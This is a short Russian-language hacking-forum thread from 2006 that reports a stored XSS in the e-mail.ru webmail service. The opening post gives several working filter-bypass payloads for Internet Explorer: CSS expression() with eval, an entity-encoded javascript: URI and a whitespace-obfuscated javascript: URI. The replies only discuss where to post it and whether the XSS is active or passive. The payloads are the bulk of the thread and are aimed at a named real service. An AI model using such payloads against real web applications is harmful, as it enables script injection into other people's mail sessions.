xss на e-mail.ru(актив)

Discussion in 'Уязвимости' started by VampiRUS, 17 Dec 2006.

  1. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Code:
    <span style=top:expression(alert())></span>
<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span>
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>
<img src="javascript	:alert()"> и прочие извращения с пробелами и табуляцией
    работают в ie.
     
    #1 VampiRUS, 17 Dec 2006
  2. †Romi4†

    †Romi4† Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    342
    Likes Received:
    205
    Reputations:
    26
    тебе сюда:
    http://forum.antichat.ru/thread21437.html
     
    #2 †Romi4†, 17 Dec 2006
  3. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    ну это актив, а не пасив. А там постятся пассивные xss на сколько я смог заметить.
     
    #3 VampiRUS, 17 Dec 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.